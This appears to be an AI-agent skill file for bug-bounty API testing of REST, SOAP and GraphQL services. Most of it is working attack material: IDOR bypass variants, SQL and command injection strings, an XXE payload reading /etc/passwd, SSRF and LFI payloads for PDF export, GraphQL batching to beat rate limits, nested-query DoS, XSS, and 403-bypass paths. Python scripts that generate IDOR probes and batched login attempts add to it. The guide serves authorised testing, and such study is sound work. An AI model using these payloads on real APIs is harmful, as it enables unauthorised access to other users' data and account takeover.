api-fuzzing-bug-bounty

API Fuzzing for Bug Bounty


Purpose


Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.

Inputs/Prerequisites


  • Burp Suite or similar proxy tool
  • API wordlists (SecLists, api_wordlist)
  • Understanding of REST/GraphQL/SOAP protocols
  • Python for scripting
  • Target API endpoints and documentation (if available)

Outputs/Deliverables


  • Identified API vulnerabilities
  • IDOR exploitation proofs
  • Authentication bypass techniques
  • SQL injection points
  • Unauthorized data access documentation


API Types Overview


| Type | Protocol | Data Format | Structure |
|---|---|---|---|
| SOAP | HTTP | XML | Header + Body |
| REST | HTTP | JSON/XML/URL | Defined endpoints |
| GraphQL | HTTP | Custom query language | Single endpoint |

Core Workflow


Step 1: API Reconnaissance


Identify the API type and enumerate endpoints:

```bash
# Check for Swagger/OpenAPI documentation
/swagger.json /openapi.json /api-docs /v1/api-docs /swagger-ui.html

# Use Kiterunner for API discovery
kr scan https://target.com -w routes-large.kite

# Extract paths from Swagger
python3 json2paths.py swagger.json
```
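The three reconnaissance steps above end in a list of paths. The script below is an added example (not code from this page or from the json2paths tool) that does the Swagger/OpenAPI-to-paths extraction itself and goes one step further: it keeps the HTTP method and flags operations that declare no `security` requirement, which is where unauthenticated access is most likely. The spec it parses is constructed inline; on a real engagement you feed it the downloaded `swagger.json`.

```python
"""Pull every (method, path) pair out of a Swagger 2.0 or OpenAPI 3 document
and flag the operations that declare no authentication.

Added example for this page; SAMPLE_SPEC below is a constructed document,
not a real target's API description.
"""
import json
from urllib.parse import urlsplit

HTTP_METHODS = {"get", "put", "post", "delete", "options", "head", "patch", "trace"}

# Constructed sample: a global bearer requirement, one admin-only route, one route
# that explicitly opts out of auth, and one that inherits the global setting.
SAMPLE_SPEC = json.dumps({
    "swagger": "2.0",
    "basePath": "/api/v1",
    "security": [{"bearer": []}],
    "paths": {
        "/users/{id}": {
            "get": {"summary": "Get user"},
            "delete": {"summary": "Delete user", "security": [{"admin": []}]},
        },
        "/internal/debug": {"get": {"summary": "Debug info", "security": []}},
        "/health": {"get": {"summary": "Liveness"}},
    },
})


def base_path(spec):
    """Swagger 2.0 carries basePath; OpenAPI 3 carries servers[].url."""
    if "basePath" in spec:
        return spec["basePath"].rstrip("/")
    servers = spec.get("servers") or []
    if servers:
        # urlsplit handles both absolute URLs and relative ones like "/api/v2".
        return urlsplit(servers[0].get("url", "")).path.rstrip("/")
    return ""


def extract_routes(spec_text):
    """Return one dict per operation: method, full path and whether auth is required."""
    spec = json.loads(spec_text)
    base = base_path(spec)
    global_security = spec.get("security")
    routes = []
    for path, item in spec.get("paths", {}).items():
        for method, op in item.items():
            if method.lower() not in HTTP_METHODS or not isinstance(op, dict):
                continue  # skip "parameters", "summary" and other non-operation keys
            # An operation-level "security" overrides the global one. An explicit
            # empty list means "no auth required", so those are probed first.
            security = op.get("security", global_security)
            routes.append({
                "method": method.upper(),
                "path": base + path,
                "auth_required": bool(security),
            })
    return routes


def unauthenticated_routes(spec_text):
    """Operations to probe first: they declare no security requirement at all."""
    return sorted(
        f"{r['method']} {r['path']}" for r in extract_routes(spec_text) if not r["auth_required"]
    )


def fuzz_wordlist(spec_text):
    """Path-only list (with {id} placeholders kept) to feed a fuzzer or Burp Intruder."""
    return sorted({r["path"] for r in extract_routes(spec_text)})


if __name__ == "__main__":
    for route in extract_routes(SAMPLE_SPEC):
        print(route["method"], route["path"], "" if route["auth_required"] else "<- no auth declared")
```

Routes with `auth_required == False` are the first thing to hit without a token; the rest go through the authenticated-versus-unauthenticated comparison the Constraints section asks for.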

Step 2: Authentication Testing


```bash
# Test different login paths
/api/mobile/login /api/v3/login /api/magic_link /api/admin/login

# Check rate limiting on auth endpoints
# If no rate limit → brute force possible

# Test mobile vs web API separately
# Don't assume the same security controls
```

Step 3: IDOR Testing


Insecure Direct Object Reference (IDOR, also called Broken Object Level Authorization) is the most common API vulnerability. For every variant, compare the response against the baseline you get for your own ID: a different status, length or body is the signal.

```bash
# Basic IDOR
GET /api/users/1234 → GET /api/users/1235

# Even if the ID is email-based, try numeric
/?user_id=111 instead of /?user_id=user@mail.com

# Test /me/orders vs /user/654321/orders
```

**IDOR Bypass Techniques:**

```bash
# Wrap ID in array
{"id":111} → {"id":[111]}

# JSON wrap
{"id":111} → {"id":{"id":111}}

# Send ID twice
URL?id=<LEGIT>&id=<VICTIM>

# Wildcard injection
{"user_id":"*"}

# Parameter pollution (try both orders; frameworks differ on first-wins vs last-wins)
/api/get_profile?user_id=<victim>&user_id=<legit>
{"user_id":<legit_id>,"user_id":<victim_id>}
```
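An added example (not the page's code) that turns the bypass list above into a differential test: it generates every JSON and query-string variant for an object ID, sends them, and reports the ones whose 200 response contains a second account's data (you know that data because you own the second account). The backend it runs against is constructed to show a realistic root cause for the duplicate-key trick, an authorization check and a data lookup that parse the body differently; `USERS`, the `send` interface and the marker string are assumptions.

```python
"""IDOR differential tester: build the bypass variants for a JSON body and a
query string, send each one, and report which responses leak a second (victim)
account's data.

Added example for this page. The backend below is constructed to show one
realistic root cause (two different parsers for the same body); `send` is the
only thing you replace to point this at a real target.
"""
import json
import re
from urllib.parse import urlencode


def json_variants(body, field, legit, victim):
    """Yield (label, raw_json_text) mutations of `field`, per the page's techniques."""
    def with_value(value):
        mutated = dict(body)
        mutated[field] = value
        return json.dumps(mutated)

    yield "plain-victim", with_value(victim)
    yield "array-wrap", with_value([victim])
    yield "json-wrap", with_value({field: victim})
    yield "wildcard", with_value("*")
    # json.dumps cannot emit a duplicate key, so splice the second one in by hand.
    key = json.dumps(field)
    yield "dup-key-legit-then-victim", with_value(legit)[:-1] + f",{key}:{json.dumps(victim)}}}"
    yield "dup-key-victim-then-legit", with_value(victim)[:-1] + f",{key}:{json.dumps(legit)}}}"


def query_variants(field, legit, victim):
    """Query-string parameter pollution in both orders (first-wins vs last-wins)."""
    return [
        ("qs-legit-then-victim", urlencode([(field, legit), (field, victim)])),
        ("qs-victim-then-legit", urlencode([(field, victim), (field, legit)])),
    ]


def find_idor(send, body, field, legit, victim, victim_marker):
    """Send every JSON variant; report labels whose 200 response contains the victim's data."""
    leaks = []
    for label, raw in json_variants(body, field, legit, victim):
        status, text = send(raw)
        if status == 200 and victim_marker in text:
            leaks.append(label)
    return leaks


# ---- constructed vulnerable backend (illustration only) -------------------
USERS = {
    111: {"id": 111, "email": "attacker@example.com"},
    222: {"id": 222, "email": "victim@example.com"},
}


def constructed_backend(session_user_id):
    """Authorizes on the FIRST "id" a regex finds in the raw body, then loads the
    record with json.loads, which keeps the LAST duplicate key. That mismatch is
    the bug; every other variant is correctly refused."""
    def send(raw_body):
        match = re.search(r'"id"\s*:\s*(\d+)', raw_body)
        if not match or int(match.group(1)) != session_user_id:
            return 403, '{"error":"forbidden"}'
        try:
            record_id = json.loads(raw_body)["id"]
        except (ValueError, KeyError, TypeError):
            return 400, '{"error":"bad request"}'
        record = USERS.get(record_id) if isinstance(record_id, int) else None
        if record is None:
            return 404, '{"error":"not found"}'
        return 200, json.dumps(record)
    return send


if __name__ == "__main__":
    hits = find_idor(constructed_backend(111), {"id": 111}, "id", 111, 222, "victim@example.com")
    print("leaking variants:", hits)
```

Against a real target, `send` becomes a function that POSTs `raw_body` with your session cookie and returns `(status_code, response_text)`; the query-string variants go into the URL the same way, one request per entry.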

Step 4: Injection Testing

SQL Injection in JSON (the `#` comment is MySQL syntax; use `-- ` for other engines). The tell is that an always-true condition behaves like the baseline while an always-false one behaves differently:
```json
{"id":"56456"}                    → OK (baseline)
{"id":"56456 AND 1=1#"}           → OK, same response as baseline
{"id":"56456 AND 1=2#"}           → different response or error (vulnerable!)
{"id":"56456 AND sleep(15)#"}     → response delayed 15 s (time-based confirmation)
```

Command Injection:
```bash
# Ruby on Rails: if the parameter reaches Kernel#open, a leading pipe runs a command
?url=Kernel#open → ?url=|ls

# Linux command injection
api.url.com/endpoint?name=file.txt;ls%20/
```

**XXE Injection** (declare the entity, then reference it somewhere the response echoes):
```xml
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>&xxe;</root>
```

SSRF via API (HTML that the server renders, e.g. into a PDF or preview):
```html
<object data="http://127.0.0.1:8443"/>
<img src="http://127.0.0.1:445"/>
```

.NET Path.Combine Vulnerability:
```bash
# If a .NET app uses Path.Combine(path_1, path_2) with user input in path_2:
# when path_2 is rooted (e.g. C:\... or a leading \), Combine returns path_2
# and discards path_1 entirely, so the "base directory" is no restriction.
# Test for path traversal
```
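To make the JSON SQL-injection probe above concrete, here is an added example (constructed handlers, not the page's or any real API's code): a vulnerable lookup next to its parameterized fix, and the baseline / 1=1 / 1=2 probe run against both so the detection rule can be checked offline. The backend is in-memory SQLite, which has no `#` comment and no `sleep()`, so the portable `-- ` comment is used and the time-based step is left out.

```python
"""SQL injection through a JSON body: a constructed vulnerable handler next to
its parameterized fix, and the page's boolean-based probe (baseline, 1=1, 1=2)
run against both to show what "vulnerable" looks like in the response.

Added example for this page; the handlers, table and data are constructed.
"""
import json
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE invoices (id INTEGER PRIMARY KEY, owner TEXT, total REAL)")
    conn.executemany("INSERT INTO invoices VALUES (?, ?, ?)",
                     [(56456, "alice", 10.0), (56457, "bob", 99.0)])
    return conn


def vulnerable_lookup(conn, body_text):
    """Constructed bug: the JSON 'id' is interpolated straight into the SQL text."""
    record_id = json.loads(body_text)["id"]
    sql = f"SELECT id, owner, total FROM invoices WHERE id = {record_id}"
    try:
        return 200, conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return 500, str(exc)


def safe_lookup(conn, body_text):
    """Fix: enforce the expected type, then bind the value as a parameter."""
    record_id = json.loads(body_text).get("id")
    if not isinstance(record_id, int) or isinstance(record_id, bool):
        return 400, "invalid id"
    rows = conn.execute("SELECT id, owner, total FROM invoices WHERE id = ?", (record_id,)).fetchall()
    return 200, rows


def boolean_probe(handler, conn, base_id):
    """The page's three-step check. Vulnerable iff the always-true payload behaves
    like the baseline while the always-false payload behaves differently."""
    baseline = handler(conn, json.dumps({"id": base_id}))
    always_true = handler(conn, json.dumps({"id": f"{base_id} AND 1=1-- "}))
    always_false = handler(conn, json.dumps({"id": f"{base_id} AND 1=2-- "}))
    return baseline == always_true and baseline != always_false


def union_dump(handler, conn, base_id):
    """Follow-up once the probe is positive: pull every row with a UNION."""
    payload = f"{base_id} UNION SELECT id, owner, total FROM invoices-- "
    return handler(conn, json.dumps({"id": payload}))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", boolean_probe(vulnerable_lookup, db, 56456))
    print("parameterized handler injectable:", boolean_probe(safe_lookup, db, 56456))
    print("dumped rows:", union_dump(vulnerable_lookup, db, 56456))
```

The probe returns `False` for the fixed handler because the 1=1 payload no longer matches the baseline (it is rejected as a non-integer), not because the server hid the error; a handler that silently casts `"56456 AND 1=1"` to `56456` would also read as safe here, which is why the time-based step stays in the checklist for engines that support it.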

Step 5: Method Testing

```bash
# Test all HTTP methods
GET /api/v1/users/1
POST /api/v1/users/1
PUT /api/v1/users/1
DELETE /api/v1/users/1
PATCH /api/v1/users/1

# Switch content type
Content-Type: application/json → application/xml
```

---

GraphQL-Specific Testing


Introspection Query

Fetch the entire backend schema:
```graphql
{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}
```
Shorter GET-parameter version (URL-encode the braces and quotes if the server rejects them raw):
```
/graphql?query={__schema{types{name,kind,description,fields{name}}}}
```

GraphQL IDOR

```graphql
# Try accessing other user IDs
query { user(id: "OTHER_USER_ID") { email password creditCard } }
```
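The introspection query above and the IDOR probe below it fit together: once the schema is known, the probe query can be generated rather than hand-written. This added example (not the page's code) parses a constructed introspection response, lists every field with its arguments, flags sensitive-looking and deprecated fields, and builds the `user(id:)` query selecting all scalar fields of the returned type. The sample schema, the helper constructors and the `SENSITIVE_WORDS` list are assumptions made for the illustration.

```python
"""Turn an introspection response into an attack-surface list and auto-build the
IDOR probe query for a root field: unwrap the field's return type, collect its
scalar fields (including deprecated ones), and flag names that look sensitive.

Added example for this page; SAMPLE_INTROSPECTION is a constructed response in
the shape the introspection query returns, not data from a real target.
"""
import json

SENSITIVE_WORDS = ("password", "token", "secret", "credit", "ssn", "apikey")


def scalar(name):
    return {"kind": "SCALAR", "name": name, "ofType": None}


def non_null(inner):
    return {"kind": "NON_NULL", "name": None, "ofType": inner}


def field(name, ftype, args=(), deprecated=False):
    return {"name": name, "type": ftype, "isDeprecated": deprecated,
            "args": [{"name": a, "type": t} for a, t in args]}


OBJ_USER = {"kind": "OBJECT", "name": "User", "ofType": None}
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "mutationType": {"name": "Mutation"},
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            field("user", OBJ_USER, args=[("id", non_null(scalar("ID")))]),
            field("me", OBJ_USER),
        ]},
        {"kind": "OBJECT", "name": "Mutation", "fields": [
            field("login", scalar("String"),
                  args=[("input", {"kind": "INPUT_OBJECT", "name": "LoginInput", "ofType": None})]),
        ]},
        {"kind": "OBJECT", "name": "User", "fields": [
            field("id", non_null(scalar("ID"))),
            field("email", scalar("String")),
            field("password", scalar("String")),
            field("creditCard", scalar("String")),
            field("legacyToken", scalar("String"), deprecated=True),
            field("posts", {"kind": "LIST", "name": None,
                            "ofType": {"kind": "OBJECT", "name": "Post", "ofType": None}}),
        ]},
        {"kind": "OBJECT", "name": "__Schema", "fields": []},
        {"kind": "SCALAR", "name": "String", "fields": None},
    ],
}}}


def unwrap(t):
    """Strip NON_NULL / LIST wrappers to reach the named type."""
    while t.get("ofType"):
        t = t["ofType"]
    return t


def types_by_name(resp):
    return {t["name"]: t for t in resp["data"]["__schema"]["types"]}


def attack_surface(resp):
    """Every field as 'Type.field(arg: T)', plus the sensitive-looking subset."""
    signatures, sensitive = [], []
    for t in resp["data"]["__schema"]["types"]:
        if t["name"].startswith("__"):
            continue  # introspection meta-types
        for f in t.get("fields") or []:
            args = ", ".join(f"{a['name']}: {unwrap(a['type'])['name']}" for a in f.get("args") or [])
            sig = f"{t['name']}.{f['name']}({args})" + (" [deprecated]" if f.get("isDeprecated") else "")
            signatures.append(sig)
            if any(w in f["name"].lower() for w in SENSITIVE_WORDS):
                sensitive.append(sig)
    return {"fields": signatures, "sensitive": sensitive}


def build_probe_query(resp, root_field, arg_values):
    """Build `query { root(args) { <all scalar fields> } }` for the IDOR check."""
    types = types_by_name(resp)
    query_type = types[resp["data"]["__schema"]["queryType"]["name"]]
    target = next(f for f in query_type["fields"] if f["name"] == root_field)
    return_type = types[unwrap(target["type"])["name"]]
    selection = [f["name"] for f in return_type["fields"] if unwrap(f["type"])["kind"] == "SCALAR"]
    # json.dumps produces a valid GraphQL string literal (same escaping rules).
    args = ", ".join(f"{k}: {json.dumps(v)}" for k, v in arg_values.items())
    return f"query {{ {root_field}({args}) {{ {' '.join(selection)} }} }}"


if __name__ == "__main__":
    surface = attack_surface(SAMPLE_INTROSPECTION)
    print("\n".join(surface["fields"]))
    print("sensitive:", surface["sensitive"])
    print(build_probe_query(SAMPLE_INTROSPECTION, "user", {"id": "OTHER_USER_ID"}))
```

Deprecated fields are kept on purpose: they are often the ones that still work but no longer get authorization review, which is also why the introspection query above passes `includeDeprecated:true`.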

GraphQL SQL/NoSQL Injection

```graphql
mutation {
  login(input: {
    email: "test' or 1=1--"
    password: "password"
  }) {
    success
    jwt
  }
}
```

Rate Limit Bypass (Batching)

Several login attempts in one HTTP request. Three anonymous `mutation { ... }` blocks placed one after another in a single document is not valid GraphQL (multiple operations must be named and one selected with `operationName`), so give each call an alias inside one mutation instead, or send a JSON array of separate queries where the server supports array batching:

```graphql
mutation {
  a: login(input:{email:"a@example.com" password:"password"}){success jwt}
  b: login(input:{email:"b@example.com" password:"password"}){success jwt}
  c: login(input:{email:"c@example.com" password:"password"}){success jwt}
}
```
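An added example (not from the page) that builds the batch in the two forms servers actually accept: a single mutation with aliased calls, and a JSON array of independent operations for servers that allow array batching. The credential list is constructed; `successful_aliases` relies on the fact that GraphQL returns each aliased call's result under its alias name.

```python
"""Build rate-limit-bypass batches for the login mutation in the two forms
servers accept: one document with aliased calls, or a JSON array of separate
queries (array batching, supported by several servers, sometimes behind a flag).

Added example for this page; CANDIDATES is a constructed credential list.
"""
import json

# Constructed credential candidates (e.g. a password-spray list).
CANDIDATES = [
    ("a@example.com", "password"),
    ("b@example.com", "password"),
    ("c@example.com", "password"),
]


def gql_string(value):
    """GraphQL string literals use the same escaping as JSON, so json.dumps is safe."""
    return json.dumps(value)


def aliased_batch(candidates, field="login", selection="success jwt"):
    """One mutation, N aliased calls: the server runs every attempt in a single request."""
    calls = [
        f"  attempt{i}: {field}(input: {{email: {gql_string(email)}, "
        f"password: {gql_string(pw)}}}) {{ {selection} }}"
        for i, (email, pw) in enumerate(candidates)
    ]
    return "mutation {\n" + "\n".join(calls) + "\n}"


def array_batch(candidates, field="login", selection="success jwt"):
    """JSON-array batching: one HTTP request carrying a list of independent operations."""
    return [
        {"query": f"mutation {{ {field}(input: {{email: {gql_string(e)}, "
                  f"password: {gql_string(p)}}}) {{ {selection} }} }}"}
        for e, p in candidates
    ]


def successful_aliases(response_json):
    """Aliases whose attempt succeeded, from a response to aliased_batch()."""
    data = response_json.get("data") or {}
    return [alias for alias, result in data.items() if result and result.get("success")]


if __name__ == "__main__":
    print(aliased_batch(CANDIDATES))
    print(json.dumps(array_batch(CANDIDATES), indent=2))
```

Send `aliased_batch(...)` as `{"query": "<document>"}` and `array_batch(...)` as the raw JSON array; a rate limiter that counts HTTP requests sees one request either way, which is the bypass. If the server rejects the array form it does not support array batching, and the aliased form is the one to use.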

GraphQL DoS (Nested Queries)

```graphql
query {
  posts {
    comments {
      user {
        posts {
          comments {
            user {
              posts { ... }
            }
          }
        }
      }
    }
  }
}
```

GraphQL XSS

```bash
# XSS via GraphQL endpoint (reflected if the error or result echoes the argument)
http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}

# URL-encoded XSS (same payload with braces, quotes and angle brackets encoded)
http://target.com/graphql?query=%7Buser(name%3A%22%3Cscript%3Ealert(1)%3C%2Fscript%3E%22)%7Bid%7D%7D
```

GraphQL Tools

| Tool | Purpose |
|---|---|
| GraphCrawler | Schema discovery |
| graphw00f | Fingerprinting |
| clairvoyance | Schema reconstruction |
| InQL | Burp extension |
| GraphQLmap | Exploitation |

Endpoint Bypass Techniques

When receiving 403/401, try these bypasses:

```bash
# Original blocked request
/api/v1/users/sensitivedata → 403

# Bypass attempts
/api/v1/users/sensitivedata.json
/api/v1/users/sensitivedata?
/api/v1/users/sensitivedata/
/api/v1/users/sensitivedata??
/api/v1/users/sensitivedata%20
/api/v1/users/sensitivedata%09
/api/v1/users/sensitivedata#
/api/v1/users/sensitivedata&details
/api/v1/users/..;/sensitivedata
```

---

Output Exploitation

PDF Export Attacks

```html
<!-- LFI via PDF export -->
<iframe src="file:///etc/passwd" height=1000 width=800>

<!-- SSRF via PDF export -->
<object data="http://127.0.0.1:8443"/>

<!-- Port scanning -->
<img src="http://127.0.0.1:445"/>

<!-- IP disclosure -->
<img src="https://iplogger.com/yourcode.gif"/>
```

DoS via Limits

```bash
# Normal request
/api/news?limit=100

# DoS attempt
/api/news?limit=9999999999
```

---

Common API Vulnerabilities Checklist

| Vulnerability | Description |
|---|---|
| API Exposure | Unprotected endpoints exposed publicly |
| Misconfigured Caching | Sensitive data cached incorrectly |
| Exposed Tokens | API keys/tokens in responses or URLs |
| JWT Weaknesses | Weak signing, no expiration, algorithm confusion |
| IDOR / BOLA | Broken Object Level Authorization |
| Undocumented Endpoints | Hidden admin/debug endpoints |
| Different Versions | Security gaps in older API versions |
| Rate Limiting | Missing or bypassable rate limits |
| Race Conditions | TOCTOU vulnerabilities |
| XXE Injection | XML parser exploitation |
| Content Type Issues | Switching between JSON/XML |
| HTTP Method Tampering | GET→DELETE/PUT abuse |

Quick Reference

| Vulnerability | Test Payload | Risk |
|---|---|---|
| IDOR | Change user_id parameter | High |
| SQLi | `' OR 1=1--` in JSON | Critical |
| Command Injection | `; ls /` | Critical |
| XXE | DOCTYPE with ENTITY | High |
| SSRF | Internal IP in params | High |
| Rate Limit Bypass | Batch requests | Medium |
| Method Tampering | GET→DELETE | High |

Tools Reference

| Category | Tool | URL |
|---|---|---|
| API Fuzzing | Fuzzapi | github.com/Fuzzapi/fuzzapi |
| API Fuzzing | API-fuzzer | github.com/Fuzzapi/API-fuzzer |
| API Fuzzing | Astra | github.com/flipkart-incubator/Astra |
| API Security | apicheck | github.com/BBVA/apicheck |
| API Discovery | Kiterunner | github.com/assetnote/kiterunner |
| API Discovery | openapi_security_scanner | github.com/ngalongc/openapi_security_scanner |
| API Toolkit | APIKit | github.com/API-Security/APIKit |
| API Keys | API Guesser | api-guesser.netlify.app |
| GUID | GUID Guesser | gist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18 |
| GraphQL | InQL | github.com/doyensec/inql |
| GraphQL | GraphCrawler | github.com/gsmith257-cyber/GraphCrawler |
| GraphQL | graphw00f | github.com/dolevf/graphw00f |
| GraphQL | clairvoyance | github.com/nikitastupin/clairvoyance |
| GraphQL | batchql | github.com/assetnote/batchql |
| GraphQL | graphql-cop | github.com/dolevf/graphql-cop |
| Wordlists | SecLists | github.com/danielmiessler/SecLists |
| Swagger Parser | Swagger-EZ | rhinosecuritylabs.github.io/Swagger-EZ |
| Swagger Routes | swagroutes | github.com/amalmurali47/swagroutes |
| API Mindmap | MindAPI | dsopas.github.io/MindAPI/play |
| JSON Paths | json2paths | github.com/s0md3v/dump/tree/master/json2paths |

Constraints

Must:
  • Test mobile, web, and developer APIs separately
  • Check all API versions (/v1, /v2, /v3)
  • Validate both authenticated and unauthenticated access
Must Not:
  • Assume the same security controls across API versions
  • Skip testing undocumented endpoints
  • Ignore rate limiting checks
Should:
  • Add the `X-Requested-With: XMLHttpRequest` header to simulate the frontend
  • Check archive.org for historical API endpoints
  • Test for race conditions on sensitive operations

Examples

Example 1: IDOR Exploitation

```bash
# Original request (own data)
GET /api/v1/invoices/12345
Authorization: Bearer <token>

# Modified request (other user's data)
GET /api/v1/invoices/12346
Authorization: Bearer <token>

# Response reveals the other user's invoice data
```

Example 2: GraphQL Introspection

```bash
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name,fields{name}}}}"}'
```

Troubleshooting

| Issue | Solution |
|---|---|
| API returns nothing | Add the `X-Requested-With: XMLHttpRequest` header |
| 401 on all endpoints | Try adding a `?user_id=1` parameter |
| GraphQL introspection disabled | Use clairvoyance for schema reconstruction |
| Rate limited | Use IP rotation or batch requests |
| Can't find endpoints | Check Swagger, archive.org, JS files |

When to Use


This skill is applicable to execute the workflow or actions described in the overview.